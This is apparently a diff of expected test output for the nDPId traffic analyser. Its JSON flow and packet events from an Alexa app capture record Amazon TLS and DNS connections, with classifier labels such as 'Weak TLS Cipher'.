+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976046418,"flow_last_seen":1490976048924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":9785,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1490976047096,"flow_last_seen":1490976048927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1490976041942,"flow_last_seen":1490976046399,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41433,"flow_avg_l4_payload_len":531,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976041961,"flow_last_seen":1490976042341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5681,"flow_avg_l4_payload_len":334,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976047560,"flow_last_seen":1490976048909,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8468,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976043814,"flow_last_seen":1490976046408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10383,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976043814,"flow_last_seen":1490976046401,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11039,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976047563,"flow_last_seen":1490976048928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5664,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976047858,"flow_last_seen":1490976048917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4531,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976041870,"flow_last_seen":1490976042512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6902,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1490976047014,"flow_last_seen":1490976048924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":43,"flow_first_seen":1490976047050,"flow_last_seen":1490976048924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":22531,"flow_avg_l4_payload_len":523,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976047560,"flow_last_seen":1490976048909,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8468,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976043814,"flow_last_seen":1490976046408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10383,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976043814,"flow_last_seen":1490976046401,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11039,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490976047563,"flow_last_seen":1490976048928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5664,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976047858,"flow_last_seen":1490976048917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4531,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976041870,"flow_last_seen":1490976042512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6902,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976047014,"flow_last_seen":1490976048924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1490976047050,"flow_last_seen":1490976048924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":22531,"flow_avg_l4_payload_len":523,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976037754,"flow_last_seen":1490976042398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3335,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976037754,"flow_last_seen":1490976042398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3335,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1490976177026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1490976177026,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWmFAAEARM1GsECrYrBAqARDYADUALXE1hGEBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":1490976177105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1490976177105,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR5+JAAEARpb+sECoBrBAq2AA1ENgAPRuAhGGBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAACEABDbvHLI="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976177105,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976177105,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8k45AAEAGfKSsECrYNu8cssZsAbvv1RDwAAAAAKAC\/\/\/QEwAAAgQFtAQCCAoA9oN+AAAAAAEDAwg="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -808,80 +808,80 @@ 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2617,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1490976177226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177226,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWDhAAOcGEQY27xyyrBAq2AG7xm3jvKzYm8EnVHASH\/4drgAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2619,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok49AAEAGfLesECrYNu8cssZsAbvv1RDxxhHYKlAQAVccyQAA"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopC1AAEAGbBmsECrYNu8cssZtAbubwSdU47ys2VAQAVdoHwAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177233,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177235,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 